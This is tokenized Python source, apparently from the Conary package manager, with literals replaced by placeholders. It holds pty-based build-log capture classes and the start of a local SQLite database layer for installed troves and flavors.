descriptorStack . append ( descriptor ) <EOL> @ callable <EOL> def popDescriptor ( self , descriptor = None ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> desc = descriptorStack . pop ( ) <EOL> if descriptor : <EOL> assert descriptor == desc <EOL> return desc <EOL> @ callable <EOL> def addRecordData ( self , * args ) : <EOL> if not args : <EOL> return <EOL> if len ( args ) < <NUM_LIT:2> : <EOL> key , val = args [ <NUM_LIT:0> ] . split ( None , <NUM_LIT:1> ) <EOL> else : <EOL> key , val = args <EOL> if key [ <NUM_LIT:0> ] . isdigit ( ) or not re . match ( '<STR_LIT>' , key , <EOL> flags = re . LOCALE | re . UNICODE ) : <EOL> raise RuntimeError ( "<STR_LIT>" % key ) <EOL> if isinstance ( val , ( str , unicode ) ) : <EOL> val = saxutils . escape ( val ) <EOL> recordData = self . _getRecordData ( ) <EOL> recordData [ key ] = val <EOL> @ callable <EOL> def delRecordData ( self , key ) : <EOL> recordData = self . _getRecordData ( ) <EOL> recordData . pop ( key , None ) <EOL> @ callable <EOL> def reportMissingBuildRequires ( self , data ) : <EOL> self . pushDescriptor ( '<STR_LIT>' ) <EOL> self . log ( data , levelname = '<STR_LIT>' ) <EOL> self . popDescriptor ( '<STR_LIT>' ) <EOL> @ callable <EOL> def reportExcessBuildRequires ( self , data ) : <EOL> self . pushDescriptor ( '<STR_LIT>' ) <EOL> self . log ( data , levelname = '<STR_LIT>' ) <EOL> self . popDescriptor ( '<STR_LIT>' ) <EOL> @ callable <EOL> def reportExcessSuperclassBuildRequires ( self , data ) : <EOL> self . pushDescriptor ( '<STR_LIT>' ) <EOL> self . log ( data , levelname = '<STR_LIT>' ) <EOL> self . popDescriptor ( '<STR_LIT>' ) <EOL> class FileLogWriter ( LogWriter ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . stream = None <EOL> LogWriter . __init__ ( self ) <EOL> self . logging = False <EOL> def start ( self ) : <EOL> self . stream = openPath ( self . path ) <EOL> self . logging = True <EOL> def freetext ( self , text ) : <EOL> if self . logging : <EOL> self . stream . write ( text ) <EOL> self . stream . flush ( ) <EOL> def newline ( self ) : <EOL> if self . logging : <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . stream . flush ( ) <EOL> carriageReturn = newline <EOL> def close ( self ) : <EOL> self . stream . close ( ) <EOL> self . logging = False <EOL> class StreamLogWriter ( LogWriter ) : <EOL> def __init__ ( self , stream = None ) : <EOL> self . data = threading . local ( ) <EOL> self . data . hideLog = False <EOL> self . stream = stream <EOL> LogWriter . __init__ ( self ) <EOL> self . index = <NUM_LIT:0> <EOL> self . closed = bool ( self . stream ) <EOL> def start ( self ) : <EOL> if not self . stream : <EOL> self . stream = sys . stdout <EOL> def freetext ( self , text ) : <EOL> if not self . data . __dict__ . get ( '<STR_LIT>' ) : <EOL> self . stream . write ( text ) <EOL> self . stream . flush ( ) <EOL> self . index += len ( text ) <EOL> def newline ( self ) : <EOL> if not self . data . __dict__ . get ( '<STR_LIT>' ) : <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . stream . flush ( ) <EOL> self . index = <NUM_LIT:0> <EOL> def carriageReturn ( self ) : <EOL> if not self . data . __dict__ . get ( '<STR_LIT>' ) : <EOL> if ( self . index % <NUM_LIT> ) : <EOL> spaces = <NUM_LIT> - ( self . index % <NUM_LIT> ) <EOL> self . stream . write ( spaces * '<STR_LIT:U+0020>' ) <EOL> self . stream . write ( '<STR_LIT:\r>' ) <EOL> self . stream . flush ( ) <EOL> self . index = <NUM_LIT:0> <EOL> @ callable <EOL> def pushDescriptor ( self , descriptor ) : <EOL> if descriptor == '<STR_LIT>' : <EOL> self . data . hideLog = True <EOL> @ callable <EOL> def popDescriptor ( self , descriptor = None ) : <EOL> if descriptor is None : <EOL> return <EOL> if descriptor == '<STR_LIT>' : <EOL> self . data . hideLog = False <EOL> @ callable <EOL> def reportExcessSuperclassBuildRequires ( self , data ) : <EOL> pass <EOL> class SubscriptionLogWriter ( LogWriter ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . stream = None <EOL> LogWriter . __init__ ( self ) <EOL> self . logging = False <EOL> self . current = None <EOL> self . rePatternList = [ ] <EOL> self . r = None <EOL> @ callable <EOL> def subscribe ( self , pattern ) : <EOL> self . rePatternList . append ( pattern ) <EOL> self . r = re . compile ( '<STR_LIT>' % '<STR_LIT:|>' . join ( self . rePatternList ) ) <EOL> @ callable <EOL> def synchronizeMark ( self , timestamp ) : <EOL> if self . current : <EOL> self . newline ( forceNewline = True ) <EOL> self . stream . write ( timestamp ) <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . stream . flush ( ) <EOL> def start ( self ) : <EOL> self . stream = file ( self . path , '<STR_LIT:a>' ) <EOL> self . logging = True <EOL> def freetext ( self , text ) : <EOL> if self . current : <EOL> self . current += text <EOL> else : <EOL> self . current = text <EOL> def newline ( self , forceNewline = False ) : <EOL> if self . current : <EOL> if self . current [ - <NUM_LIT:1> ] == '<STR_LIT:\\>' : <EOL> self . current = self . current . rstrip ( '<STR_LIT:\\>' ) <EOL> if not forceNewline : <EOL> return <EOL> if self . r and self . r . match ( self . current ) : <EOL> self . stream . write ( self . current ) <EOL> self . stream . write ( '<STR_LIT:\n>' ) <EOL> self . current = None <EOL> carriageReturn = newline <EOL> def close ( self ) : <EOL> self . stream . close ( ) <EOL> self . logging = False <EOL> def startLog ( path , xmlPath , subscribeLogPath , withStdin = True ) : <EOL> """<STR_LIT>""" <EOL> plainWriter = FileLogWriter ( path ) <EOL> xmlWriter = XmlLogWriter ( xmlPath ) <EOL> screenWriter = StreamLogWriter ( ) <EOL> subscriptionWriter = SubscriptionLogWriter ( subscribeLogPath ) <EOL> file ( subscribeLogPath , '<STR_LIT:a>' ) <EOL> lgr = Logger ( withStdin = withStdin , <EOL> writers = [ plainWriter , xmlWriter , <EOL> screenWriter , subscriptionWriter ] , <EOL> syncPath = subscribeLogPath ) <EOL> lgr . startLog ( ) <EOL> return lgr <EOL> def escapeMessage ( msg ) : <EOL> assert ( '<STR_LIT>' not in msg ) <EOL> msg = msg . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> msg . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> return msg <EOL> def unescapeMessage ( msg ) : <EOL> msg = msg . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> msg = msg . replace ( '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> msg = msg . replace ( '<STR_LIT>' , '<STR_LIT:\\>' ) <EOL> return msg <EOL> class Logger : <EOL> def __init__ ( self , withStdin = True , writers = [ ] , syncPath = None ) : <EOL> if not termios : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . marker = base64 . b64encode ( os . urandom ( <NUM_LIT> ) ) <EOL> self . lexer = Lexer ( self . marker ) <EOL> for writer in writers : <EOL> self . lexer . registerCallback ( writer . handleToken ) <EOL> self . writers = writers <EOL> self . syncPath = syncPath <EOL> self . logging = False <EOL> self . closed = False <EOL> self . withStdin = withStdin <EOL> self . data = threading . local ( ) <EOL> def _getDescriptorStack ( self ) : <EOL> if not hasattr ( self . data , '<STR_LIT>' ) : <EOL> self . data . descriptorStack = [ ] <EOL> return self . data . descriptorStack <EOL> def directLog ( self , msg ) : <EOL> self . command ( "<STR_LIT>" % escapeMessage ( msg ) ) <EOL> def command ( self , cmdStr ) : <EOL> sys . stdout . flush ( ) <EOL> sys . stderr . flush ( ) <EOL> msg = "<STR_LIT>" % ( self . marker , cmdStr ) <EOL> os . write ( sys . stdout . fileno ( ) , msg ) <EOL> def write ( self , * msgs ) : <EOL> for msg in msgs : <EOL> os . write ( sys . stdout . fileno ( ) , msg ) <EOL> def flush ( self ) : <EOL> sys . stdout . flush ( ) <EOL> def pushDescriptor ( self , descriptor ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> descriptorStack . append ( descriptor ) <EOL> self . command ( "<STR_LIT>" % descriptor ) <EOL> def popDescriptor ( self , descriptor = None ) : <EOL> descriptorStack = self . _getDescriptorStack ( ) <EOL> if descriptor : <EOL> if not descriptorStack : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( descriptor , ) ) <EOL> stackTop = descriptorStack [ - <NUM_LIT:1> ] <EOL> if descriptor != stackTop : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( stackTop , descriptor ) ) <EOL> descriptorStack . pop ( ) <EOL> self . command ( "<STR_LIT>" % descriptor ) <EOL> return stackTop <EOL> self . command ( "<STR_LIT>" ) <EOL> return None <EOL> def addRecordData ( self , key , val ) : <EOL> self . command ( '<STR_LIT>' % ( key , val ) ) <EOL> def delRecordData ( self , key ) : <EOL> self . command ( '<STR_LIT>' % key ) <EOL> def subscribe ( self , pattern ) : <EOL> self . command ( '<STR_LIT>' % pattern ) <EOL> def reportMissingBuildRequires ( self , reqList ) : <EOL> self . command ( '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( reqList ) ) <EOL> def reportExcessBuildRequires ( self , reqList ) : <EOL> self . command ( '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( reqList ) ) <EOL> def reportExcessSuperclassBuildRequires ( self , reqList ) : <EOL> self . command ( '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( reqList ) ) <EOL> def synchronize ( self ) : <EOL> timestamp = '<STR_LIT>' % time . time ( ) <EOL> timestampLen = len ( timestamp ) <EOL> self . command ( '<STR_LIT>' % timestamp ) <EOL> self . flush ( ) <EOL> syncFile = file ( self . syncPath ) <EOL> def _fileLongEnough ( ) : <EOL> syncFile . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> return syncFile . tell ( ) > timestampLen <EOL> def _waitedTooLong ( i , stage ) : <EOL> if i > <NUM_LIT> : <EOL> syncFile . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> length = syncFile . tell ( ) <EOL> raise ConaryError ( <EOL> '<STR_LIT>' % ( <EOL> stage , length ) ) <EOL> i = <NUM_LIT:0> <EOL> while not _fileLongEnough ( ) : <EOL> _waitedTooLong ( i , '<STR_LIT>' ) <EOL> i += <NUM_LIT:1> <EOL> time . sleep ( <NUM_LIT> ) <EOL> def _seekTimestamp ( ) : <EOL> syncFile . seek ( - ( timestampLen + <NUM_LIT:1> ) , <NUM_LIT:2> ) <EOL> i = <NUM_LIT:0> <EOL> _seekTimestamp ( ) <EOL> while syncFile . read ( timestampLen ) != timestamp : <EOL> _waitedTooLong ( i , '<STR_LIT>' ) <EOL> i += <NUM_LIT:1> <EOL> time . sleep ( <NUM_LIT> ) <EOL> _seekTimestamp ( ) <EOL> def __del__ ( self ) : <EOL> if self . logging and not self . closed : <EOL> self . close ( ) <EOL> def startLog ( self ) : <EOL> """<STR_LIT>""" <EOL> self . restoreTerminalControl = ( sys . stdin . isatty ( ) and <EOL> os . tcgetpgrp ( <NUM_LIT:0> ) == os . getpid ( ) ) <EOL> masterFd , slaveFd = os . openpty ( ) <EOL> signal . signal ( signal . SIGTTOU , signal . SIG_IGN ) <EOL> pid = os . fork ( ) <EOL> if pid : <EOL> os . close ( masterFd ) <EOL> self . _becomeLogSlave ( slaveFd , pid ) <EOL> return <EOL> try : <EOL> os . close ( slaveFd ) <EOL> for writer in self . writers : <EOL> writer . start ( ) <EOL> logger = _ChildLogger ( masterFd , self . lexer , <EOL> self . restoreTerminalControl , self . withStdin ) <EOL> try : <EOL> logger . log ( ) <EOL> finally : <EOL> self . lexer . close ( ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> def _becomeLogSlave ( self , slaveFd , loggerPid ) : <EOL> """<STR_LIT>""" <EOL> self . loggerPid = loggerPid <EOL> if self . withStdin and sys . stdin . isatty ( ) : <EOL> self . oldTermios = termios . tcgetattr ( sys . stdin . fileno ( ) ) <EOL> else : <EOL> self . oldTermios = None <EOL> newTermios = termios . tcgetattr ( slaveFd ) <EOL> newTermios [ <NUM_LIT:6> ] [ termios . VTIME ] = '<STR_LIT:\x00>' <EOL> newTermios [ <NUM_LIT:6> ] [ termios . VMIN ] = '<STR_LIT>' <EOL> termios . tcsetattr ( slaveFd , termios . TCSADRAIN , newTermios ) <EOL> tty . setraw ( slaveFd ) <EOL> self . oldStderr = os . dup ( sys . stderr . fileno ( ) ) <EOL> self . oldStdout = os . dup ( sys . stdout . fileno ( ) ) <EOL> if self . withStdin : <EOL> self . oldStdin = os . dup ( sys . stdin . fileno ( ) ) <EOL> os . dup2 ( slaveFd , <NUM_LIT:0> ) <EOL> else : <EOL> self . oldStdin = sys . stdin . fileno ( ) <EOL> os . dup2 ( slaveFd , <NUM_LIT:1> ) <EOL> os . dup2 ( slaveFd , <NUM_LIT:2> ) <EOL> os . close ( slaveFd ) <EOL> self . logging = True <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . logging : <EOL> return <EOL> self . closed = True <EOL> if self . oldStdin != <NUM_LIT:0> : <EOL> os . dup2 ( self . oldStdin , <NUM_LIT:0> ) <EOL> os . dup2 ( self . oldStdout , <NUM_LIT:1> ) <EOL> os . dup2 ( self . oldStderr , <NUM_LIT:2> ) <EOL> if self . oldTermios is not None : <EOL> termios . tcsetattr ( <NUM_LIT:0> , termios . TCSADRAIN , self . oldTermios ) <EOL> if self . oldStdin != <NUM_LIT:0> : <EOL> os . close ( self . oldStdin ) <EOL> os . close ( self . oldStdout ) <EOL> os . close ( self . oldStderr ) <EOL> try : <EOL> if sys . stdin . isatty ( ) and self . restoreTerminalControl : <EOL> os . tcsetpgrp ( <NUM_LIT:0> , os . getpgrp ( ) ) <EOL> except AttributeError : <EOL> pass <EOL> signals = [ signal . SIGTERM , signal . SIGKILL ] <EOL> while signals : <EOL> start = time . time ( ) <EOL> while time . time ( ) - start < <NUM_LIT:10> : <EOL> pid , status = os . waitpid ( self . loggerPid , os . WNOHANG ) <EOL> if pid : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> else : <EOL> signum = signals . pop ( <NUM_LIT:0> ) <EOL> os . kill ( self . loggerPid , signum ) <EOL> continue <EOL> break <EOL> else : <EOL> os . waitpid ( self . loggerPid , <NUM_LIT:0> ) <EOL> class _ChildLogger : <EOL> def __init__ ( self , ptyFd , lexer , controlTerminal , withStdin ) : <EOL> self . ptyFd = ptyFd <EOL> self . lexer = lexer <EOL> self . shouldControlTerminal = controlTerminal <EOL> self . withStdin = withStdin <EOL> def _controlTerminal ( self ) : <EOL> try : <EOL> if sys . stdin . isatty ( ) : <EOL> os . tcsetpgrp ( <NUM_LIT:0> , os . getpgrp ( ) ) <EOL> except AttributeError : <EOL> pass <EOL> def _resizeTerminal ( self ) : <EOL> """<STR_LIT>""" <EOL> s = struct . pack ( '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> result = fcntl . ioctl ( sys . stdin . fileno ( ) , termios . TIOCGWINSZ , s ) <EOL> rows , cols = struct . unpack ( '<STR_LIT>' , result ) [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> s = struct . pack ( '<STR_LIT>' , rows , cols , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> fcntl . ioctl ( self . ptyFd , termios . TIOCSWINSZ , s ) <EOL> def _setTerminalSize ( self , rows , cols ) : <EOL> s = struct . pack ( '<STR_LIT>' , rows , cols , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> fcntl . ioctl ( self . ptyFd , termios . TIOCSWINSZ , s ) <EOL> def log ( self ) : <EOL> if self . shouldControlTerminal : <EOL> self . _controlTerminal ( ) <EOL> self . _setTerminalSize ( <NUM_LIT> , <NUM_LIT> ) <EOL> ptyFd = self . ptyFd <EOL> lexer = self . lexer <EOL> stdin = sys . stdin . fileno ( ) <EOL> unLogged = '<STR_LIT>' <EOL> pollObj = select . poll ( ) <EOL> pollObj . register ( ptyFd , select . POLLIN ) <EOL> if self . withStdin and os . isatty ( stdin ) : <EOL> pollObj . register ( stdin , select . POLLIN ) <EOL> sigwinch = [ ] <EOL> def sigwinch_handler ( s , f ) : <EOL> sigwinch . append ( True ) <EOL> while True : <EOL> try : <EOL> read = [ x [ <NUM_LIT:0> ] for x in pollObj . poll ( ) ] <EOL> except select . error , msg : <EOL> if msg . args [ <NUM_LIT:0> ] != <NUM_LIT:4> : <EOL> raise <EOL> read = [ ] <EOL> if ptyFd in read : <EOL> try : <EOL> output = os . read ( ptyFd , BUFFER ) <EOL> except OSError , msg : <EOL> if msg . errno == errno . EIO : <EOL> break <EOL> elif msg . errno != errno . EINTR : <EOL> raise <EOL> else : <EOL> lexer . write ( output ) <EOL> if stdin in read : <EOL> try : <EOL> input = os . read ( stdin , BUFFER ) <EOL> except OSError , msg : <EOL> if msg . errno == errno . EIO : <EOL> break <EOL> elif msg . errno != errno . EINTR : <EOL> raise <EOL> else : <EOL> os . write ( ptyFd , input ) <EOL> if sigwinch : <EOL> sigwinch = [ ] </s>
<s> import itertools <EOL> import time <EOL> from conary import dbstore <EOL> from conary import deps , errors , files , streams , trove , versions <EOL> from conary . dbstore import idtable , sqlerrors <EOL> from conary . local import deptable , troveinfo , versiontable , schema <EOL> from conary . lib import api <EOL> from conary . trovetup import TroveTuple <EOL> OldDatabaseSchema = schema . OldDatabaseSchema <EOL> class Tags ( idtable . CachedIdTable ) : <EOL> def __init__ ( self , db ) : <EOL> idtable . CachedIdTable . __init__ ( self , db , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class VersionCache ( dict ) : <EOL> def get ( self , vs , ts ) : <EOL> key = vs , ts <EOL> if self . has_key ( key ) : <EOL> return self [ key ] <EOL> ts = [ float ( x ) for x in ts . split ( "<STR_LIT::>" ) ] <EOL> v = versions . VersionFromString ( vs , timeStamps = ts ) <EOL> self [ key ] = v <EOL> return v <EOL> class FlavorCache ( dict ) : <EOL> def get ( self , frozen ) : <EOL> if self . has_key ( frozen ) : <EOL> return self [ frozen ] <EOL> if frozen is None : <EOL> f = deps . deps . Flavor ( ) <EOL> else : <EOL> f = deps . deps . ThawFlavor ( frozen ) <EOL> self [ frozen ] = f <EOL> return f <EOL> class DBTroveFiles : <EOL> """<STR_LIT>""" <EOL> addItemStmt = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> def __init__ ( self , db ) : <EOL> self . db = db <EOL> schema . createDBTroveFiles ( db ) <EOL> self . tags = Tags ( self . db ) <EOL> def __getitem__ ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> for path , stream in cu : <EOL> yield ( path , stream ) <EOL> def getByInstanceId ( self , instanceId , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> else : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> for path , stream in cu : <EOL> yield ( path , stream ) <EOL> def delInstance ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , instanceId ) <EOL> cu . execute ( "<STR_LIT>" , instanceId ) <EOL> def getFileByFileId ( self , fileId , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , fileId ) <EOL> else : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , fileId ) <EOL> try : <EOL> path , stream = cu . next ( ) <EOL> return ( path , stream ) <EOL> except StopIteration : <EOL> raise KeyError , fileId <EOL> def addItem ( self , cu , pathId , versionId , path , fileId , instanceId , <EOL> stream , tags , addItemSql = None ) : <EOL> assert ( len ( pathId ) == <NUM_LIT:16> ) <EOL> if addItemSql is None : <EOL> addItemSql = self . addItemStmt <EOL> cu . execute ( addItemSql , pathId , versionId , path , fileId , instanceId , <EOL> <NUM_LIT:1> , stream ) <EOL> streamId = cu . lastrowid <EOL> for tag in tags : <EOL> cu . execute ( "<STR_LIT>" , <EOL> streamId , self . tags [ tag ] ) <EOL> def iterPath ( self , path ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , path ) <EOL> for instanceId in cu : <EOL> yield instanceId [ <NUM_LIT:0> ] <EOL> def removePath ( self , instanceId , path ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , ( path , instanceId ) ) <EOL> def _updatePathIdsPresent ( self , instanceId , pathIdList , isPresent ) : <EOL> chunkSize = <NUM_LIT> <EOL> plen = len ( pathIdList ) <EOL> cu = self . db . cursor ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < plen : <EOL> clen = min ( chunkSize , plen - i ) <EOL> bvals = [ isPresent , instanceId ] + pathIdList [ i : i + clen ] <EOL> bparams = '<STR_LIT:U+002C>' . join ( '<STR_LIT:?>' * clen ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % bparams , <EOL> bvals ) <EOL> i += clen <EOL> def removePathIds ( self , instanceId , pathIdList ) : <EOL> self . _updatePathIdsPresent ( instanceId , pathIdList , isPresent = <NUM_LIT:0> ) <EOL> def restorePathIds ( self , instanceId , pathIdList ) : <EOL> self . _updatePathIdsPresent ( instanceId , pathIdList , isPresent = <NUM_LIT:1> ) <EOL> def iterFilesWithTag ( self , tag ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , tag ) <EOL> for path , in cu : <EOL> yield path <EOL> class DBInstanceTable : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , db ) : <EOL> self . db = db <EOL> schema . createInstances ( db ) <EOL> def iterNames ( self ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for match in cu : <EOL> yield match [ <NUM_LIT:0> ] <EOL> def hasName ( self , name ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> name ) <EOL> return cu . fetchone ( ) != None <EOL> def iterByName ( self , name ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , name ) <EOL> for match in cu : <EOL> yield match <EOL> def addId ( self , troveName , versionId , flavorId , timeStamps , <EOL> isPresent = True , pinned = False ) : <EOL> assert ( min ( timeStamps ) > <NUM_LIT:0> ) <EOL> if isPresent : <EOL> isPresent = <NUM_LIT:1> <EOL> else : <EOL> isPresent = <NUM_LIT:0> <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ( troveName , versionId , flavorId , <EOL> "<STR_LIT::>" . join ( [ "<STR_LIT>" % x for x in timeStamps ] ) , isPresent , <EOL> pinned ) ) <EOL> return cu . lastrowid <EOL> def delId ( self , theId ) : <EOL> assert ( type ( theId ) is int ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" , theId ) <EOL> def getId ( self , theId , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> pres = "<STR_LIT>" <EOL> else : <EOL> pres = "<STR_LIT>" <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" % pres , theId ) <EOL> try : <EOL> return cu . next ( ) <EOL> except StopIteration : <EOL> raise KeyError , theId <EOL> def isPresent ( self , item ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> item ) <EOL> val = cu . fetchone ( ) <EOL> if not val : <EOL> return <NUM_LIT:0> <EOL> return val [ <NUM_LIT:0> ] <EOL> def idIsPresent ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId ) <EOL> val = cu . fetchone ( ) <EOL> if not val : <EOL> return <NUM_LIT:0> <EOL> return val [ <NUM_LIT:0> ] <EOL> def setPresent ( self , theId , val , pinned ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> % theId , val , pinned ) <EOL> def has_key ( self , item ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> item ) <EOL> return not ( cu . fetchone ( ) == None ) <EOL> def __getitem__ ( self , item ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> item ) <EOL> try : <EOL> return cu . next ( ) [ <NUM_LIT:0> ] <EOL> except StopIteration : <EOL> raise KeyError , item <EOL> def get ( self , item , defValue , justPresent = True ) : <EOL> cu = self . db . cursor ( ) <EOL> if justPresent : <EOL> pres = "<STR_LIT>" <EOL> else : <EOL> pres = "<STR_LIT>" <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % pres , item ) <EOL> item = cu . fetchone ( ) <EOL> if not item : <EOL> return defValue <EOL> return item [ <NUM_LIT:0> ] <EOL> def getVersion ( self , instanceId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , instanceId ) <EOL> try : <EOL> ( s , t ) = cu . next ( ) <EOL> ts = [ float ( x ) for x in t . split ( "<STR_LIT::>" ) ] <EOL> v = versions . VersionFromString ( s , timeStamps = ts ) <EOL> return v <EOL> except StopIteration : <EOL> raise KeyError , instanceId <EOL> class Flavors ( idtable . IdTable ) : <EOL> def addId ( self , flavor ) : <EOL> return idtable . IdTable . addId ( self , flavor . freeze ( ) ) <EOL> def __getitem__ ( self , flavor ) : <EOL> if flavor is None : <EOL> raise KeyError , "<STR_LIT>" <EOL> assert ( isinstance ( flavor , deps . deps . DependencySet ) ) <EOL> if flavor . isEmpty ( ) : <EOL> return <NUM_LIT:0> <EOL> return idtable . IdTable . __getitem__ ( self , flavor . freeze ( ) ) <EOL> def getId ( self , flavorId ) : <EOL> return deps . deps . ThawFlavor ( idtable . IdTable . getId ( self , flavorId ) ) <EOL> def get ( self , flavor , defValue ) : <EOL> if flavor is None : <EOL> return <NUM_LIT:0> <EOL> assert ( isinstance ( flavor , deps . deps . DependencySet ) ) <EOL> if flavor . isEmpty ( ) : <EOL> return <NUM_LIT:0> <EOL> return idtable . IdTable . get ( self , flavor . freeze ( ) , defValue ) <EOL> def __delitem__ ( self , flavor ) : <EOL> assert ( isinstance ( flavor , deps . deps . DependencySet ) ) <EOL> if flavor . isEmpty ( ) : <EOL> return <EOL> idtable . IdTable . __delitem__ ( self , flavor . freeze ( ) ) <EOL> def getItemDict ( self , itemSeq ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" <EOL> % ( self . strName , self . keyName , self . tableName , self . strName , <EOL> "<STR_LIT:U+002C>" . join ( [ "<STR_LIT>" % x . freeze ( ) for x in itemSeq ] ) ) ) <EOL> return dict ( cu ) <EOL> def __init__ ( self , db ) : <EOL> idtable . IdTable . __init__ ( self , db , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> cu = db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> if cu . fetchone ( ) == None : <EOL> cu . execute ( "<STR_LIT>" ) <EOL> class DBFlavorMap ( idtable . IdMapping ) : <EOL> def __init__ ( self , db ) : <EOL> idtable . IdMapping . __init__ ( self , db , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> class Database : <EOL> timeout = <NUM_LIT> <EOL> def __init__ ( self , path , timeout = None ) : <EOL> if timeout is not None : <EOL> self . timeout = timeout <EOL> self . db = None <EOL> try : <EOL> self . db = dbstore . connect ( path , driver = "<STR_LIT>" , <EOL> timeout = self . timeout ) <EOL> self . schemaVersion = self . db . getVersion ( ) . major <EOL> except sqlerrors . DatabaseLocked : <EOL> raise errors . DatabaseLockedError <EOL> self . db . dbh . _BEGIN = "<STR_LIT>" <EOL> try : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> except sqlerrors . ReadOnlyDatabase : <EOL> readOnly = True <EOL> else : <EOL> readOnly = False <EOL> self . db . rollback ( ) <EOL> if readOnly and self . schemaVersion < schema . VERSION : <EOL> raise OldDatabaseSchema ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif self . schemaVersion > schema . VERSION : <EOL> raise schema . NewDatabaseSchema ( ) <EOL> self . db . loadSchema ( ) <EOL> newCursor = self . schemaVersion < schema . VERSION <EOL> schema . checkVersion ( self . db ) <EOL> if newCursor : <EOL> cu = self . db . cursor ( ) <EOL> if self . schemaVersion == <NUM_LIT:0> : <EOL> schema . createSchema ( self . db ) <EOL> schema . setupTempDepTables ( self . db , cu ) <EOL> schema . setupTempTables ( self . db , cu ) <EOL> self . troveFiles = DBTroveFiles ( self . db ) <EOL> self . instances = DBInstanceTable ( self . db ) <EOL> self . versionTable = versiontable . VersionTable ( self . db ) <EOL> self . flavors = Flavors ( self . db ) <EOL> self . flavorMap = DBFlavorMap ( self . db ) <EOL> self . depTables = deptable . DependencyTables ( self . db ) <EOL> self . troveInfoTable = troveinfo . TroveInfoTable ( self . db ) <EOL> self . needsCleanup = False <EOL> self . addVersionCache = { } <EOL> self . flavorsNeeded = { } <EOL> def __del__ 